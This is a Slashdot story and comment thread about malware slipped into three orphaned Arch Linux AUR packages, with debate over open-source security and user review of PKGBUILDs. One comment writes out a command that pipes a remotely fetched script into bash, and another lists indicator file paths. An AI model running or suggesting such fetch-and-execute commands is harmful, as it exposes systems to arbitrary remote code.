Malware Found in Arch Linux AUR Package Repository

An anonymous reader shares a report: Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code has been removed thanks to the quick intervention of the AUR team. The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors. On Saturday, a user going by the pseudonym of "xeactor" took over one such orphaned package named "acroread" that allows Arch Linux users to view PDF files. According to a Git commit to the packag's source code, xeactor added malicious code that would download a file named "~x" from ptpb [dot] pw, a lightweight site mimicking Pastebin that allows users to share small pieces of texts.

A rare photo of a malware author being born.

[AlanObject]

From the looks of it the bad actor xeactor didn't have any expectation beyond finding out if his little trick would work or not.

On the other side this could be a case study about the immune system that open source provides.

Re:A rare photo of a malware author being born.

or the rare photo of someone that has been successfully exploiting this for a long time and got lazy with the latest batch.

Re:A rare photo of a malware author being born.

If Xeacter neekaps were broken he would'a found out plenty. OOh the pain ... Ohhh the strain ...

Re:A rare photo of a malware author being born.

about the immune system that open sourceprovides
You might be in the minority. We entertain no such illusions.

Moar Fake News!

This is IMPOSSIBLE in a Linux environment. There are MANY EYES that guarantee this CANNOT happen.

Trump 2020

Re: Moar Fake News!

Trump Eunuch

Re:Moar Fake News!

In other news the DevOps idiots believe that "curl -O - http://legit.ru/install.sh | bash" on a production server is fine.

Re:Moar Fake News!

[phantomfive]

No one ever said that open source was perfect. But consider that we are talking about one piece of malware......then notice how much malware has been found in the Apple store and the Android store.

Re:Moar Fake News!

#QAnon #TheGreatAwakwning

Re: Moar Fake News!

[Zero__Kelvin]

I always love hearing from the idiots who say that bugs / malicious code that gets found shows that Open Source doesn't have the advantage that more bugs will be found. I wonder if y'all are really that stupid.

Re:Moar Fake News!

[Oswald+McWeany]

This is IMPOSSIBLE in a Linux environment. There are MANY EYES that guarantee this CANNOT happen.

Trump 2020

It's the year of the Linux malware.

Re: Moar Fake News!

The AUR is a user repository. It's little different than going onto GitHub and downloading files off random users.

Why so little malware?

I'm more interested in why there is so little malware. I would have expected lots of malware without any packages needing to be hijacked.

Re:Why so little malware?

[jmccue]

I kind of wonder this also. I do not know how many package maintainers in ARCH or how it works, but with the amount of packages available in some distros these days I guess I should not be surprised.

Sad that distro maintainers may have to vet maintainers now, adding an additional burden. But as a user we should always be careful with non-core packages.

Re:Why so little malware?

I'm more interested in why there is so little malware.

How many packages (maintainers) are actually already compromised, waiting for the trigger to be pulled to push out the big fail? How would you know?

Re:Why so little malware?

It needs another malware program to run. Something called systemd.

Re:Why so little malware?

[XArtur0]

First: We don't know if there is any more until we find it. Therefore: The System is as Secure as an Open Door.

Second: Malware authors target platform that matter, i.e. Windows (large user base), RedHat (users are companies), Linux Kernel itself (large user base, governments, companies, etc...)

And Lastly: There is nothing worthwhile to steal from unemployed neckbeards (although I like Arch, and I work over 14 hrs a day the days I don't attend university).

Re:Why so little malware?

I kind of wonder this also. I do not know how many package maintainers in ARCH or how it work.

This was Arch AUR. So not official Arch packages, but user-submitted scripts provided for convenience that you install 100% at your own risk (after you manually inspect the scripts).

Re:Why so little malware?

[BrianMarshall]

I made this comment in the story that is about to roll off the bottom of the page...

At home, I have used Linux - first Redhat, then Fedora - since about 1999. I have never used any sort of virus/malware scanning software. As far as I know, I have never had any malware. I don't know how common this is.

Re:Why so little malware?

[nnull]

Because many arch users actually check the install scripts in AUR and don't just install yaourt. *wink*

Re:Why so little malware?

[AHuxley]

Its a lot of work for number of users per distro. To look at free work on a distro on the users computer?
With other consumer OS the ability to "consume" would be of interest to malware.

Re:Why so little malware?

[Tyger-ZA]

I kind of wonder this also. I do not know how many package maintainers in ARCH or how it works, but with the amount of packages available in some distros these days I guess I should not be surprised.

Sad that distro maintainers may have to vet maintainers now, adding an additional burden. But as a user we should always be careful with non-core packages.

1) Vetting who get's to alter OS packages should be the default, not an "extra burden". Or would you all like an "npm left pad" sort of disaster on your OS? 2) This makes ALL the Arch packages look suspicious, given that there may be others that have been hijacked in this way which we just haven't heard about yet.

Re:Why so little malware?

[Opportunist]

Effort vs. effect. And that ratio simply sucks when you consider the market share of Linux, and then that this market share is also again split up between the various distributions.

Hence invading a distribution repository isn't that helpful if your goal is what most untargeted malware attacks are aiming for: Wide distribution. It's different if you have a specific target in mind, like a particular government facility, but then you would probably be rather targeting one of the larger distributions, not Arch.

Re:Why so little malware?

There is a lot actually but no one bothers to check code anymore, they add on and add on until it gets too big and then they remove stuff that people use the most just so they can say they made it smaller.

Re: Why so little malware?

[Zero__Kelvin]

I see you are confused about how software and Open Source work, even though you are posting on a story of it actually happening. Each individual doesn't have to inspect their own copy. Just one qualified person is all it takes, then everyone benefits from the improved security that results from identifying and correcting the issue. I know ... I know... this technology stuff is *SO* confusing!

Re: Why so little malware?

[Zero__Kelvin]

People aren't going to waste their time when they know any malicious code will be discovered quickly and there is a high chance their name will be spread far and wide on the blackball circuit.

Re:Why so little malware?

This makes ALL the Arch packages look suspicious, given that there may be others that have been hijacked in this way which we just haven't heard about yet.

What do you mean? AUR is an unofficial user repository - it says absolutely nothing about about the quality of the Arch's official repositories.

Re:Why so little malware?

2) This makes ALL the Arch packages look suspicious, given that there may be others that have been hijacked in this way which we just haven't heard about yet.

In this case, it is repository. If any of packages were hijacked, the original owner of the repository will be the one to be blamed on. This situation arises because AUR allows new guys to take over those repositories that original owners abandon. Most if not all original owners of packages are likely to be reputable contributors. Thus, your conspiracy doesn't work.

Re: Why so little malware?

[hairyfeet]

Except there is a fatal flaw with your argument which TFA shows, which is the whole thing is based on an "is ought" fallacy. You ASSUME there OUGHT to be someone who 1.- Has the years in IT security to spot obfuscated malware code, 2.- Has the time to vet every single package every time it is altered, and 3.- Is able to do that for every single package available before any of those packages are updated but just because you again ASSUME there OUGHT to be someone or multiple someones doing that does NOT mean there IS someone doing that.

Hell if you think about it even for a minute you'll see how foolish the entire argument is, I mean how many packages are in your average distro? Now how many packages are in your average repo? And as we all know shit is changing in the Linux world constantly so how many of those packages are getting changed in any given month? If any of you has looked at the code for the obfuscated C contest you'll know its not hard to hide malware code in such a way its DAMN hard to spot...now are you REALLY gonna sit here and argue that someone is paying some huge team of top IT security researchers to sit there 8 hours a day doing NOTHING but vetting your favorite distro? Really? Remember this isn't something you can get some volunteer to do as well written malware code isn't gonna be at all easy to spot and it can even be broken up so that pieces of it is in multiple packages, it takes coders with years of security exp to spot the signs and those guys? Yeah they ain't cheap, not at all.

Re: Why so little malware?

[Zero__Kelvin]

I guess the irony escapes you that you are claimimg something doesn't work in a story about it actually working. Nobody said Open Source will be free of bugs and malware; the fact is that Open Source leaves open opportunities to get better that closed source doesn't have. This is just one example of the Open Source model working in a way closed source simply can't.

Re:Why so little malware?

I wondered when you'd show up. You're like the inevitable wasps at a picnic, but with no sting and more grizzling.

Re:Why so little malware?

By reading the pkgbuild file, which is just a shell script that defines some variables and functions for makepkg to use when building the package. Go take a look yourself, the PKGBUILD files are all pretty easily viewed through your browser.
Unless you're talking about the package sources being compromised, which would be a much bigger problem, and disingenuous to pin on AUR itself.

Re:Why so little malware?

I always used to, when I used Arch, but I could easily be in the minority there. Yaourt is just a convenience, and still lets you check the scripts you download before building and installing them if you want to.

Re:Why so little malware?

Unfortunately Systemd is part of Arch and ultimately why I stopped using the distro.

For a start the upgrade to Systemd broke my Arch install. Though to be fair I upgraded infrequently which probably isn't the best idea for a rolling release distro, and due to that I could have missed some important instructions.

But more importantly I feel that Systemd breaks the KISS (Keep It Simple Stupid) philosophy that Arch Linux used to have, which was a large part of why I used Arch. Systemd is just too complex for the average user to really understand, and what I mean is understand what it does behind the scenes, rather than the interface it presents to the user.

I've now switched to Debian because if I can't have a system that I understand the inner workings of, I might as well use one that is stable.

Re: Why so little malware?

[hairyfeet]

Heartbleed ring ANY bells? That was exploited for God knows how long before anybody got hit with a clue bat (in fact last I checked there are STILL servers out there with the exploit unpatched) but again because everyone ASSUMES the code is being vetted that bug was able to stay in there for decades.

Then there is the infected Quake 3 Arena that stayed in the Ubuntu repo for over a year, the KDELook trojan that lasted nearly 2 years, hell i could go on all day listing times where nasty shit got completely overlooked because everyone assumed that SOMEBODY was checking this shit...but they weren't and as I pointed out just a teeny tiny bit of logic blows the entire premise to shit.

But lets here it Einstein, because I'm sure we'll all find the insane logic hoops you'll be jumping through REALLY funny...explain to us where these magical security IT teams are coming from to vet every single package on the repo of your choice because as I pointed out unless they have years of exp spotting obfuscated C code is DAMN hard, who is paying the many millions to have them do nothing but check all that code, and how they are able to check the hundreds if not thousands of packages that change in any given year on your average distro.

Because I'm willing to bet my last dollar that if you look at who is accessing the code for the boring bits and bobs that make up your average distro, all the dull parts from the calendar function to the googly eyes to the code that controls the wallpaper, that the only ones accessing that code are the guys doing the changes who you again ASSUME that they are never gonna turn out to be a bad actor...yeah GL with that. Before there really wasn't any point attacking Linux because there just wasn't enough users to make it a juicy target...now there is crypto bugs where you can make an assload using every CPU and GPU you can get your hands on to mine coins....yeah I have a feeling you are seeing the tip of the iceberg and it won't take long before the crypto bugs come in force...again GL with that.

Re: Why so little malware?

[Zero__Kelvin]

Heartbleed is a perfect example of a problem that was only found because it was Open Source. You want to cry "look how long it took (to work)" as some argument that it didn't happen .... and again, that is stupid. The point is it was found and fixed, and that only happened because it was open source. I didn't waste my time reading the rest of the drivel you wrote. Either you are a troll or you lack the facilities to understand this simple concept.

Re: Why so little malware?

This issue was with bash scripts, not C code. You don't seem to have a grasp of the context of this current event. This "obfuscated C code contest" angle of argument is getting you nowhere. Nobody is denying how easy it is to hide malicious code in such a big, ugly low-level language as C, but if you had any idea how little time it takes to manually inspect a PKGBUILD, you'd realize why this kind of problem happens so rarely in a community-maintained package repository consisting of 47,738 packages and counting.

Open source is not immune to malicious code, but it is more resistant. It also helps that reporting malicious code is seen as good citizenship in our community, whereas reporting exploits in proprietary software comes with the risk of having a knock at your door by the police just for doing the right thing. Forget the "many eyes" argument of open source (because honestly, everyone tries to exploit all software, closed or open) -- the real thing that keeps us in the open source community safer than those who use proprietary software is that we welcome bug reports, security notices and fixes, whereas it's a mixed bag when working with proprietary software developers. If I report this flaw, will the company who makes the software be vigilant and make a patch? Will they even listen to me at all? Will they thank me? Will they reward me? Will they charge me with some bullshit under the CFAA and send me to prison, just to save face? Who knows?

Re:Why so little malware?

Oh, fuck yaourt. If you can't do "git pull; less PKGBUILD" followed by "makepkg -csi" you shouldn't be using Arch Linux.

Why not put malicious code in post-install script?

[wuyongzheng]

First, post-install script runs as root. Second, it runs during installation. If putting it in the program (e.g. acroread), the user has to run it to trigger. Most Linus package systems support post-install script. e.g. https://docs-old.fedoraproject...

Caught within 1-3 hours. Phone apps stay for month

[raymorris]

He was caught within a few hours, because all changes all public:

https://aur.archlinux.org/cgit...

Possibly bad guys would rather add trojans to iPhone and Android apps, which may stay in the store for months without detection. You can't tell what changes have been made to compiled apps you download on iPhone, Android, or Windows.

Re:Why not put malicious code in post-install scri

I recommend either installing AUR packages by hand, during which you can check the Post-Install, or using a AUR Helper that allows viewing of said script. True, it takes time to verify yourself. But, a precursory glance helps screen some of the stupid stuff like pulling a script from a pastebin clone.

And yes, it takes time. That's always a tradeoff, convenience vs security.

Doesn't surprise me

I used Arch for about 7 years until last year. I *always* inspected every AUR package by hand to make sure it wasn't doing anything suspicious. And 95% of the time I would hack around to make it install without any root privileges whatsoever, unlike the default.

The amount of AUR install scripts I had to edit or modify was quite high too. For example you would install an AUR package but the program would be out of date, so you have to update the package location and the verification hash. Or it would pull a file from some unofficial place and instead I would update it to be from the official github repositories, etc.

You can tell a lot of less popular AUR packages are put together by non linux power users, to say the least.

If you wanted to inject a bunch of malware with new AUR files it would be pretty easy, I bet there is a lot more uncaught ones. Because the script pulling files from random servers and passing the hash check (that the malware creator provides) gives a huge false sense of security.

The answer is simple: Eternal September.

Arch scares the iSimple crowd that prays their daily KISS (keep it simply stupid) mantra. Fans of AOL^WApple haven't invaded it yet nor demanded it becomes a "Desktop" to suite their lighs-out-upper-storey needs, like with Noobuntu.

This is such a load of BS

I use Arch. Packages from the AUR are supposed to be manually reviewed by the user, so a user playing by the rules should not be affected by things like this. Plus, this "malware" was so badly coded that it didn't even do anything.

Re:This is such a load of BS

[nnull]

More than likely a proof of concept to show some forum mods how stupid they look. It was only a matter of time someone tried to pull this off on AUR. I don't know why they don't expand on AUR to have more trusted maintainers, as there are quite a bit of programs there that have known maintainers of projects. It gets used quite often on Arch due to missing packages.

Affected Packages

[Philotomy]

According to posts on aur-general, the known affected packages are:

• acroread 9.5.5-8
• balz 1.20-3
• minergate 8.1-2

According to comments on the AUR acroread package, the script the compromised package installed (to upload system details) contained an error and wouldn't function properly. The script also installed a systemd timer, and the comments advise checking your system for:

• /usr/lib/xeactor
• /usr/lib/systemd/system/xeactor.timer
• /usr/lib/systemd/system/xeactor.service

As a side-comment, for those unfamiliar with Arch, these compromised packages are not part of the official Arch repositories. The AUR is a "user repository": a collection of user-supplied packages which require deliberate download and installation. AUR packages should [i]always[/i] be reviewed before installing them, and not installed if you don't trust the package. As the AUR documentation explains, "Warning: Carefully check all files. Carefully check the PKGBUILD and any .install file for malicious commands. PKGBUILDs are bash scripts containing functions to be executed by makepkg: these functions can contain any valid commands or Bash syntax, so it is totally possible for a PKGBUILD to contain dangerous commands through malice or ignorance on the part of the author. Since makepkg uses fakeroot (and should never be run as root), there is some level of protection but you should never count on it. If in doubt, do not build the package and seek advice on the forums or mailing list."

Re: Affected Packages

The official security bulletin also advises end users to look for a highly suspect and malicious malware code called 'systemd'. If found, removal is strongly recommended and encouraged for both the sanity and security of the end user and system.

Re:Affected Packages

[AmiMoJo]

Ah, the classic wetware exploit: user too lazy to carefully examine every file before installing.

Re:Affected Packages

Here's the commit for acroread

https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f167

Re:Affected Packages

By the way, 'acroread' is Adobe Acrobat Reader.

This the summary failed to mention.

It is a pretty major piece of software, I guess, but I doubt many people use it in *nix-land.

Re:Affected Packages

To be fair, I'm not sure that many people use it in Windows land either these days.

These are the infected packages

[aglider]

https://lists.archlinux.org/pi...

"discovered in at least three Arch"

"At least" - why the sensationalism? You could equally write "just" or, preferably nothing.

It's a matter of trust

[aglider]

If you read the mailing lista thread you understand where the real problem is.

"Users should check what they install". What's been tour latest package check?
Have you checksummed tour ISO download?

And why shouldn't I check the downloafs from the ma in website? Because of trust?
There fan always ne a crack I can use to slip into, if I have enough motivation.

I think the whole system is screwed up. I think "we can't rewind we've gone to far".

Re:It's a matter of trust

[aquabat]

I think the whole system is screwed up.

It could be just your keyboard driver. If you think you've been infected, maybe check that one.

Re: It's a matter of trust

[Zero__Kelvin]

You shouldn't do it for the official / non user repos because that check gets performed automatically by the package management tool so it would be redundant.

Re: It's a matter of trust

[aglider]

So you are saying there's no way to slip into the official package system or the official software repository.
Cool.
We'd need to have that everywhere, then!

Re: It's a matter of trust

[Zero__Kelvin]

Dont be snarky about something you don't even understand. What I said is that there is a way but it involves being able to change the file(s) on the server that hold the checksums as well as the actual package(s). It is an extremely secure method, which is why you almost never see a story about an official repo being compromised.

AUR is not secure by design, but that's fine

[damaki]

It is written basically everywhere in the AUR official documentation: do not trust AUR packages, verify everything before install! AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it. For AUR packages security, you are on your own and you should check the sources thoroughly when you install an AUR package!

Re:AUR is not secure by design, but that's fine

[sad_]

the people who actually care are a minority, most people will just install whatever.
it's like that on windows (people just download and install anything they find on whatever shady site) or smartphones (most android problems result from installing apk's downloaded from... shady sites).
things like AUR, PPA's, containers (docker, snap, ...) etc bring this problem to linux. it's a security disaster waiting to happen.

Re:AUR is not secure by design, but that's fine

Usually you will check the PKGBUILD because at least 1 out of 3 AUR will failed to compile.
If you get no makefile error, you will get a lib runtime error. Or it will be missing a dependancy. Or something else.

Anyway a systemd file is not very stealthy, especially if active. I usually have at most ~10 active systemd service (most disabled / stopped). Arch is not windows.

Re: AUR is not secure by design, but that's fine

[Zero__Kelvin]

That is a ridiculous thing to say. Use of non-official packages / software is *always* a risk, and everything you are claiming is some kind of Achilles heal is actually the tools that help mitigate that risk. They work quite well and have been working well over a decade.

Re:AUR is not secure by design, but that's fine

[drinkypoo]

AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it.

No, AUR packages are not like Ubuntu PPAs, because every deb is signed, and every PPA belongs to a specific user. You cannot get malware from another user account which has taken over a PPA simply by updating, because Ubuntu does not allow different user accounts to take over a PPA. Naturally, someone who manages to take over someone else's identity to the point that they can sign packages as that user can upload malware to their PPA, but that's true of all such schemes.

Letting users take over other users' repos is a misfeature, period. Users should have to change repos to get packages from a different user.

Most people aren't criminals.

And anyone smart enough to build malware is usually smart enough to know it's bad, wrong and probably a criminal offense of some kind anywhere on the planet.

Malware found in pastebin service

What a piece of garbage article, its like a pastebin with changable ownership. Would you also post a news article for every pastebin that contains bullshit? No, right? There isn't much of a difference compared to the AUR where random people upload random content. If you use it without carefully reviewing you are the one to blame.

Next: FreeBSD

Next in line for malware pwnage, if it isn't already, is FreeBSD. There, you can create a bugzilla account with no-one checking who you are, and submit a patch to any port. If the port is badly maintained, and the maintainer does not see or react to it (which most of those ports are), any committer will take the patch and commit it, if it builds, USUALLY WITHOUT checking for what it does. If it builds, it passes, is committed.

The only thing surprising here is the fact all this wasn't discovered earlier. An Ubuntu snap, Gentoo GitHub repo, Arch AUR, all in few weeks. 2018 will be the year of Pwnage (and it started so well with Meltdown and Spectre).

packages effected

packages compromised according to mailing list
* acrored 9.5.5-8
* balz 1.20-3
* minergate 8.1-2

According to #archlinux "jelle" "we decided not to talk about it"